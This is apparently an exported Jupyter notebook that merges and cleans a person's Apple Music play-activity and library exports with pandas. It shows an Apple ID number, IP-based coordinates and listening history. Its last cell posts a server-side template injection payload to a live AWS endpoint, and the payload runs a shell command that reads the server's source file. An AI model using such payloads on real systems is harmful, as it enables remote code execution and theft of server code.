,Track Identifier,Track Year,Track Number On Album,Track Count On Album,Disc Number Of Album,Disc Count Of Album,Track Duration,Track Play Count,Skip Count,Playlist Only Track,Purchased Track Identifier,Apple Music Track Identifier,Display Work Name,Audio Matched Track Identifier,Tag Matched Track Identifier,Rating,Album Rating,Remember Playback Position,Beats Per Minute,Favorite Status - Track
count,8.084000e+03,8084.000000,8084.000000,8084.000000,8084.000000,8084.000000,8.084000e+03,8084.00000,8084.000000,396.000000,4.760000e+02,3.242000e+03,2.0,1.100000e+01,2.981000e+03,7608.0,7608.0,7608.0,62.000000,2.0
mean,1.830714e+08,1829.974518,9.391019,1.423924,1.015339,0.918605,3.371886e+05,0.26472,0.001979,0.994949,1.224386e+09,1.014330e+09,1.0,9.157942e+08,5.100509e+08,0.0,0.0,0.0,595.467742,1.0
std,4.267514e+04,560.869846,14.318227,4.791640,0.194600,0.524359,4.875245e+05,1.01489,0.047148,0.070977,5.051184e+08,5.536713e+08,0.0,9.360458e+00,4.748565e+08,0.0,0.0,0.0,3888.586956,0.0
min,1.829975e+08,0.000000,0.000000,0.000000,1.000000,0.000000,2.856000e+03,0.00000,0.000000,0.000000,7.902380e+05,7.902380e+05,1.0,9.157942e+08,1.519840e+05,0.0,0.0,0.0,82.000000,1.0
25%,1.830344e+08,1997.000000,3.000000,0.000000,1.000000,1.000000,1.714085e+05,0.00000,0.000000,1.000000,8.017567e+08,3.621335e+08,1.0,9.157942e+08,2.073413e+08,0.0,0.0,0.0,89.000000,1.0
50%,1.830715e+08,2002.000000,7.000000,0.000000,1.000000,1.000000,2.217530e+05,0.00000,0.000000,1.000000,1.443129e+09,1.169861e+09,1.0,9.157942e+08,2.888895e+08,0.0,0.0,0.0,95.500000,1.0
75%,1.831084e+08,2004.000000,12.000000,0.000000,1.000000,1.000000,2.716145e+05,0.00000,0.000000,1.000000,1.621611e+09,1.467621e+09,1.0,9.157942e+08,8.368004e+08,0.0,0.0,0.0,104.750000,1.0
max,1.831453e+08,2024.000000,224.000000,61.000000,5.000000,10.000000,7.085688e+06,13.00000,2.000000,1.000000,1.777152e+09,1.778048e+09,1.0,9.157942e+08,1.478458e+09,0.0,0.0,0.0,30720.000000,1.0


In [63]:
# merge play activity df and library tracks directly
# new_merged_df = df.merge(library_tracks, left_on=['Song Name', 'Album Name'], right_on=['Song Name', 'Album Name'])
new_merged_df = pd.merge(df, library_tracks, on=['Song Name', 'Album Name'], how='left')

In [64]:
small_df = new_merged_df[['Song Name', 'Album Name', 'Artist']]

In [65]:
small_df.describe()

,Song Name,Album Name,Artist
count,12244,12244,974
unique,5076,2868,139
top,The Marriage of Figaro : Act IV,"Mozart: Don Giovanni, K. 527",She & Him
freq,55,312,110


In [66]:
small_df.head(150)

,Song Name,Album Name,Artist
0,Science Fiction Double Feature,Are a Drag,NaN
1,Don't Stop Believin' (2022 Remaster),Escape (2022 Remaster),NaN
2,Watch Me as I Fall,Straight Ahead,Pennywise
3,Know It All,"Acoustic, Vol. 2",NaN
4,Alison's Disease,"Acoustic, Vol. 2",NaN
...,...,...,...
145,"Boom, Boom, Boom, Boom!!",The Party Album!,NaN
146,The Marriage of Figaro : Act IV,Mozart: the Marriage of Figaro,NaN
147,Can't Stop,Visionary Jones (curated by Don Was),NaN
148,"4 Pieces for Violin and Piano from ""Much Ado A...",Love Music,NaN


In [68]:
small_df[small_df['Song Name'] == "Science Fiction Double Feature"]

,Song Name,Album Name,Artist
0,Science Fiction Double Feature,Are a Drag,NaN
116,Science Fiction Double Feature,Are a Drag,NaN
237,Science Fiction Double Feature,Are a Drag,NaN
3230,Science Fiction Double Feature,Are a Drag,NaN
8011,Science Fiction Double Feature,Are a Drag,NaN
11434,Science Fiction Double Feature,Are a Drag,NaN


In [ ]:
another_merged_df = pd.merge(small_df, library_tracks, on=['Song Name', 'Album Name'], how='left')

In [50]:
library_tracks[library_tracks['Song Name'] == "Watch Me as I Fall"][["Artist", "Song Name","Track Play Count", "Track Identifier", "Audio Matched Track Identifier", "Apple Music Track Identifier", "Tag Matched Track Identifier"]]

,Artist,Song Name,Track Play Count,Track Identifier,Audio Matched Track Identifier,Apple Music Track Identifier,Tag Matched Track Identifier
6729,Pennywise,Watch Me as I Fall,1,183120646,NaN,1.485038e+09,271944506.0


#### Convert genre to list

In [35]:
new_merged_df.describe()

,Apple ID Number,Bundle Version,Camera Option,Carrier Name,Container Artist Name,Container iTunes Playlist ID,Container Personalized ID,Container Season ID,Contingency,Display Count,...,Purchased Track Identifier,Apple Music Track Identifier,Display Work Name,Audio Matched Track Identifier,Tag Matched Track Identifier,Rating,Album Rating,Remember Playback Position,Beats Per Minute,Favorite Status - Track
count,12244.0,9.173000e+03,0.0,0.0,0.0,5.890000e+02,0.0,0.0,0.0,0.0,...,4.510000e+02,8.930000e+02,4.0,0.0,4.480000e+02,523.0,523.0,523.0,1.0,1.0
mean,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560020e+08,NaN,NaN,NaN,NaN,...,1.055523e+09,9.382313e+08,1.0,NaN,4.636204e+08,0.0,0.0,0.0,95.0,1.0
std,0.0,4.441134e-16,NaN,NaN,NaN,9.302435e+02,NaN,NaN,NaN,NaN,...,5.073269e+08,5.227850e+08,0.0,NaN,3.810051e+08,0.0,0.0,0.0,NaN,NaN
min,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560003e+08,NaN,NaN,NaN,NaN,...,7.902380e+05,7.902380e+05,1.0,NaN,1.420776e+06,0.0,0.0,0.0,95.0,1.0
25%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560010e+08,NaN,NaN,NaN,NaN,...,4.674620e+08,3.672050e+08,1.0,NaN,2.145122e+08,0.0,0.0,0.0,95.0,1.0
50%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560026e+08,NaN,NaN,NaN,NaN,...,1.167031e+09,1.117509e+09,1.0,NaN,2.916631e+08,0.0,0.0,0.0,95.0,1.0
75%,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560028e+08,NaN,NaN,NaN,NaN,...,1.470675e+09,1.440953e+09,1.0,NaN,7.241000e+08,0.0,0.0,0.0,95.0,1.0
max,277175890.0,3.100000e+00,NaN,NaN,NaN,2.560033e+08,NaN,NaN,NaN,NaN,...,1.752032e+09,1.752032e+09,1.0,NaN,1.444221e+09,0.0,0.0,0.0,95.0,1.0


In [63]:
new_merged_df["Genre"]

0          NaN
1          NaN
2        Other
3          NaN
4          NaN
         ...  
12239      NaN
12240      NaN
12241      NaN
12242      NaN
12243      NaN
Name: Genre, Length: 12244, dtype: object

In [64]:
new_merged_df["Genre"] = new_merged_df["Genre"].apply(lambda x: [x])

In [65]:
new_merged_df["Genre"]

0          [nan]
1          [nan]
2        [Other]
3          [nan]
4          [nan]
          ...   
12239      [nan]
12240      [nan]
12241      [nan]
12242      [nan]
12243      [nan]
Name: Genre, Length: 12244, dtype: object

In [66]:
# Display the merged DataFrame
new_merged_df.head()

,Age Bucket,Album Name,Apple ID Number,Apple Music Subscription,Auto Play,Build Version,Bundle Version,Camera Option,Carrier Name,Client Build Version,...,Tag Matched Track Identifier,Comments,Rating,Album Rating,Remember Playback Position,Beats Per Minute,Date of Last Skip,Track Like Rating,Favorite Status - Track,Favorite Date - Track
0,NaN,Are a Drag,277175890,True,AUTO_OFF,"Music/3.1 iOS/18.1 model/iPhone14,4 hwp/t8110 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
1,45-54,Escape (2022 Remaster),277175890,True,AUTO_ON_CONTENT_UNSUPPORTED,"Music/3.1 iOS/17.2.1 model/iPhone14,4 hwp/t811...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
2,NaN,Straight Ahead,277175890,True,AUTO_OFF,"Music/3.1 iOS/18.0 model/iPhone14,4 hwp/t8110 ...",3.1,NaN,NaN,NaN,...,271944506.0,NaN,0.0,0.0,0.0,NaN,NaN,NaN,NaN,NaN
3,NaN,"Acoustic, Vol. 2",277175890,True,AUTO_ON_CONTENT_UNSUPPORTED,"Music/3.1 iOS/15.6 model/iPhone12,8 hwp/t8030 ...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN
4,45-54,"Acoustic, Vol. 2",277175890,True,AUTO_ON,"Music/3.1 iOS/17.2.1 model/iPhone14,4 hwp/t811...",3.1,NaN,NaN,NaN,...,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN,NaN


In [67]:
new_merged_df.columns

Index(['Age Bucket', 'Album Name', 'Apple ID Number',
       'Apple Music Subscription', 'Auto Play', 'Build Version',
       'Bundle Version', 'Camera Option', 'Carrier Name',
       'Client Build Version',
       ...
       'Tag Matched Track Identifier', 'Comments', 'Rating', 'Album Rating',
       'Remember Playback Position', 'Beats Per Minute', 'Date of Last Skip',
       'Track Like Rating', 'Favorite Status - Track',
       'Favorite Date - Track'],
      dtype='object', length=179)

In [68]:
end_reason_dict = {
    "EXITED_APPLICATION": "logout",
    "FAILED_TO_LOAD": "track_error",
    "MANUALLY_SELECTED_PLAYBACK_OF_A_DIFF_ITEM": "selected_diff_item",
    "NATURAL_END_OF_TRACK": "track_done",
    "NOT_APPLICABLE": "unknown",
    "OTHER": "uknown",
    "PLAYBACK_MANUALLY_PAUSED": "pause",
    "PLAYBACK_SUSPENDED": "suspended",
    "SCRUB_BEGIN": "scrub_begin",
    "SCRUB_END": "scrub_end",
    "TRACK_SKIPPED_BACKWARDS": "back_button",
    "TRACK_SKIPPED_FORWARDS": "forward_button",
    pd.NA: "unknown"
}

In [69]:
shuffle_dict = {
    "SHUFFLE_ON": "On",
    "SHUFFLE_OFF": "Off",
    "SHUFFLE_UNKNOWN": "Unknown"
}

In [70]:
from collections import defaultdict

def constant_factory(value):
    return lambda: value

country_dict = defaultdict(constant_factory("Unknown"))
country_list = [
    ("GB", "United Kingdom"),
    ("AL", "Albania"),
    ("ES", "Spain"),
    ("IE", "Ireland"),
    ("US", "United States")
]
for k, v in country_list:
    country_dict[k] = v

In [71]:
country_dict

defaultdict(<function __main__.constant_factory.<locals>.<lambda>()>,
            {'GB': 'United Kingdom',
             'AL': 'Albania',
             'ES': 'Spain',
             'IE': 'Ireland',
             'US': 'United States'})

In [72]:
new_merged_df.replace({"IP Country Code": pd.NA}, "unknown", inplace=True)

In [73]:
new_merged_df["IP Country Code"]

0             GB
1             GB
2             GB
3        unknown
4             GB
          ...   
12239    unknown
12240         GB
12241    unknown
12242         IE
12243         GB
Name: IP Country Code, Length: 12244, dtype: object

In [74]:
new_merged_df.iloc[2][["Album Name", "Song Name", "IP Country Code"]]

Album Name             Straight Ahead
Song Name          Watch Me as I Fall
IP Country Code                    GB
Name: 2, dtype: object

In [75]:
new_merged_df["Datetime"] = pd.to_datetime(new_merged_df["Event Start Timestamp"], format='mixed')
new_merged_df["Day name"] = new_merged_df["Datetime"].dt.day_name()
new_merged_df["Day number"] = new_merged_df["Datetime"].dt.day
new_merged_df["Month number"] = new_merged_df["Datetime"].dt.month
new_merged_df["Year"] = new_merged_df["Datetime"].dt.year
new_merged_df["Hour"] = new_merged_df["Datetime"].dt.hour
new_merged_df["Song and Artist name"] = new_merged_df["Song Name"] + " | " + new_merged_df["Artist"]
new_merged_df["Platform"] = new_merged_df["Device OS Name"] + " | " + new_merged_df["Device Type"]+ " | " + new_merged_df["Device OS Version"]
new_merged_df["Milliseconds played"] = new_merged_df["Play Duration Milliseconds"]
new_merged_df.replace({"End Reason Type": end_reason_dict}, inplace=True)
new_merged_df.replace({"Shuffle Play": shuffle_dict}, inplace=True)
new_merged_df.replace({"IP Country Code": country_dict}, inplace=True)
new_merged_df["Latitude"] = new_merged_df["IP Latitude"]
new_merged_df["Longitude"] = new_merged_df["IP Longitude"]

In [76]:
new_merged_df.columns

Index(['Age Bucket', 'Album Name', 'Apple ID Number',
       'Apple Music Subscription', 'Auto Play', 'Build Version',
       'Bundle Version', 'Camera Option', 'Carrier Name',
       'Client Build Version',
       ...
       'Day name', 'Day number', 'Month number', 'Year', 'Hour',
       'Song and Artist name', 'Platform', 'Milliseconds played', 'Latitude',
       'Longitude'],
      dtype='object', length=190)

In [77]:
new_merged_df["End Reason Type"].head(10)

0          pause
1     track_done
2     track_done
3     track_done
4    scrub_begin
5     track_done
6     track_done
7     track_done
8          pause
9    scrub_begin
Name: End Reason Type, dtype: object

In [78]:
rename_columns = {
    "Album Name": "Album name",
    "Song Name": "Song name",
    "End Reason Type": "End reason",
    "Shuffle Play": "Shuffle",
    "IP Country Code": "Country"
}

In [79]:
columns_to_keep = [
    "Datetime",
    "Day name",
    "Day number",
    "Month number",
    "Year",
    "Hour",
    "Artist",
    "Album name",
    "Song name",
    "Song and Artist name",
    "Genre",
    "Platform",
    "Milliseconds played",
    "End reason",
    "Shuffle",
    "Country",
    "Latitude",
    "Longitude"
]

In [80]:
apple_df = new_merged_df.rename(columns=rename_columns)[columns_to_keep]
apple_df.head()

,Datetime,Day name,Day number,Month number,Year,Hour,Artist,Album name,Song name,Song and Artist name,Genre,Platform,Milliseconds played,End reason,Shuffle,Country,Latitude,Longitude
0,2024-11-14 15:00:00.836000+00:00,Thursday,14,11,2024,15,NaN,Are a Drag,Science Fiction Double Feature,NaN,[nan],iOS | IPHONE | 18.1,77532.0,pause,Off,United Kingdom,51.50,-0.12
1,2024-01-11 19:51:31.864000+00:00,Thursday,11,1,2024,19,NaN,Escape (2022 Remaster),Don't Stop Believin' (2022 Remaster),NaN,[nan],iOS | IPHONE | 17.2.1,249000.0,track_done,Off,United Kingdom,50.83,-1.07
2,2024-09-26 12:03:26.174000+00:00,Thursday,26,9,2024,12,Pennywise,Straight Ahead,Watch Me as I Fall,Watch Me as I Fall | Pennywise,[Other],iOS | IPHONE | 18.0,130455.0,track_done,Off,United Kingdom,51.50,-0.12
3,2022-08-09 11:17:05.765000+00:00,Tuesday,9,8,2022,11,NaN,"Acoustic, Vol. 2",Know It All,NaN,[nan],iOS | IPHONE | 15.6,202849.0,track_done,Off,unknown,NaN,NaN
4,2024-01-05 10:14:09.839000+00:00,Friday,5,1,2024,10,NaN,"Acoustic, Vol. 2",Alison's Disease,NaN,[nan],iOS | IPHONE | 17.2.1,119500.0,scrub_begin,Off,United Kingdom,50.83,-1.07


In [81]:
apple_df["Country"]

0        United Kingdom
1        United Kingdom
2        United Kingdom
3               unknown
4        United Kingdom
              ...      
12239           unknown
12240    United Kingdom
12241           unknown
12242           Ireland
12243    United Kingdom
Name: Country, Length: 12244, dtype: object

## Test merge dataframes

In [30]:
import pandas as pd
activity_df = pd.DataFrame({'song': ['foo', 'bar', 'baz', 'foo', 'bar', 'bar'],
                    'album': ["a1", "a2", "a3", "a1", "a2", "a5"]})
activity_df

,song,album
0,foo,a1
1,bar,a2
2,baz,a3
3,foo,a1
4,bar,a2
5,bar,a5


In [31]:
library_df = pd.DataFrame({'song': ['foo', 'bar', 'baz', 'bar'], 'album': ["a1", "a2", "a3", "a5"], 'artist': ["g1", "g2", "g3", "g2"]})
library_df

,song,album,artist
0,foo,a1,g1
1,bar,a2,g2
2,baz,a3,g3
3,bar,a5,g2


In [32]:
test_merged_df = pd.merge(activity_df, library_df, on=['song', 'album'], how='left')
test_merged_df

,song,album,artist
0,foo,a1,g1
1,bar,a2,g2
2,baz,a3,g3
3,foo,a1,g1
4,bar,a2,g2
5,bar,a5,g2


# Apple developer

In [71]:
import requests

In [ ]:
url = "https://1pcg25gdp9.execute-api.us-east-1.amazonaws.com/production/3-wh01"
data = {"fruit": "{{''.__class__.__base__.__subclasses__()[84]().load_module('builtins').__import__('subprocess').run(['cat lambda_function.py'], capture_output=True, shell=True).stdout}}"}

response = requests.post(url, json=data)

print(response)
print(response.text)